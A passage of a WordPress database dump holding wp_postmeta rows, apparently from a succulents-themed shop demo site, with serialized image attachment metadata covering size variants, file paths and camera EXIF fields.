\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1431,2377,'_wp_attachment_image_alt','o'),(1432,1013,'_wp_attached_file','2018/01/blog-img-14.jpg'),(1433,1805,'_wp_attachment_image_alt','a'),(1434,1013,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:733;s:4:\"file\";s:23:\"2018/01/blog-img-14.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"blog-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"blog-img-14-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blog-img-14-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"blog-img-14-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"blog-img-14-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:23:\"blog-img-14-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"blog-img-14-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:23:\"blog-img-14-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:24:\"blog-img-14-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:23:\"blog-img-14-550x733.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:733;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"blog-img-14-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1435,4260,'_wp_attachment_image_alt','a'),(1436,3935,'_wp_attached_file','2018/01/orange-banana-ready-1300-x-1945-1.jpg'),(1437,3935,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:45:\"2018/01/orange-banana-ready-1300-x-1945-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-1-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-1-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:47:\"orange-banana-ready-1300-x-1945-1-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"orange-banana-ready-1300-x-1945-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552032228\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1438,2387,'_wp_attached_file','2018/02/succulents-logo.jpg'),(1439,2387,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:778;s:6:\"height\";i:342;s:4:\"file\";s:27:\"2018/02/succulents-logo.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"succulents-logo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"succulents-logo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"succulents-logo-600x264.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"succulents-logo-300x132.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"succulents-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"succulents-logo-768x338.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"succulents-logo-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"succulents-logo-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"succulents-logo-550x342.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"succulents-logo-550x342.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:342;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"succulents-logo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"succulents-logo-600x264.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"succulents-logo-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1440,4261,'_wp_attached_file','2018/01/orange-banana-ready-1300-x-1945.jpg'),(1441,4261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:43:\"2018/01/orange-banana-ready-1300-x-1945.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:44:\"orange-banana-ready-1300-x-1945-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:43:\"orange-banana-ready-1300-x-1945-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552032228\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1442,1806,'_wp_attached_file','2018/02/portfolio-img-4.jpg'),(1443,1806,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2018/02/portfolio-img-4.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"portfolio-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"portfolio-img-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"portfolio-img-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1444,3398,'_wp_attachment_image_alt','o'),(1445,4259,'_wp_attachment_image_alt','o'),(1446,2387,'_wp_attachment_image_alt','o'),(1447,393,'_wp_attachment_image_alt','o'),(1448,2438,'_wp_attached_file','2018/02/t2.jpg'),(1449,2438,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:641;s:6:\"height\";i:399;s:4:\"file\";s:14:\"2018/02/t2.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:14:\"t2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:14:\"t2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:14:\"t2-600x373.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"t2-300x187.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"t2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:14:\"t2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:14:\"t2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:14:\"t2-550x399.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:14:\"t2-550x399.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:14:\"t2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"t2-600x373.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"t2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1450,394,'_wp_attached_file','2018/01/h2-img-6.jpg'),(1451,394,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:672;s:6:\"height\";i:447;s:4:\"file\";s:20:\"2018/01/h2-img-6.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h2-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h2-img-6-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h2-img-6-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h2-img-6-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h2-img-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h2-img-6-550x447.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h2-img-6-550x447.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h2-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h2-img-6-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h2-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1452,2438,'_wp_attachment_image_alt','o'),(1453,2440,'_wp_attached_file','2018/02/h10-slide3-testimonials.png'),(1454,2440,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:93;s:6:\"height\";i:93;s:4:\"file\";s:35:\"2018/02/h10-slide3-testimonials.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1455,2440,'_wp_attachment_image_alt','o'),(1456,1806,'_wp_attachment_image_alt','a'),(1457,2446,'_wp_attached_file','2018/01/author-img-1.png'),(1458,2446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:24:\"2018/01/author-img-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"author-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"author-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"author-img-1-100x100.png\";s:5:\"width\";i:1